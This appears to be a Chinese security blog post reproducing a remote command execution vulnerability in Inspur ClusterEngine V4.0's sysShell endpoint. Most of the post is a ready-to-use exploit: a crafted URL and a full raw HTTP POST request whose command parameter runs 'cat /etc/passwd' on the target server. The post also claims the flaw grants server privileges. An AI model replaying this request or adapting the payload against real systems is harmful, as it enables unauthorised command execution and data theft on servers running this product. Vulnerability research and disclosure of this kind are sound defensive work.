浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞

  • A+
所属分类:安全漏洞
欢迎关注公众号:进德修业行道。一名普通的白帽子,维护着一个既讲技术又有温度的原创号,一如既往地学习和分享,希望大家在紧张而忙碌的生活中可以在这里安静的学习,前行的道路上感谢有您的关注与支持。
漏洞描述
浪潮ClusterEngineV4.0 存在远程命令执行,攻击者通过发送特殊的请求可以获取服务器权限
漏洞影响
浪潮ClusterEngineV4.0
漏洞复现
访问漏洞url
https://x.x.x.x/
页面如下
浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞
hackbar构造payload
https://x.x.x.x/sysShellop=doPlease&node=cu01&command=cat /etc/passwd
如下
浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞
请求包如下
POST /sysShell HTTP/1.1Connection: closeContent-Length: 49Cache-Control: max-age=0Upgrade-Insecure-Requests: 1DNT: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9op=doPlease&node=cu01&command=cat+%2Fetc%2Fpasswd
漏洞证明
浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞
漏洞利用poc
浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:进德修业行道 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

本文始发于微信公众号(进德修业行道):浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: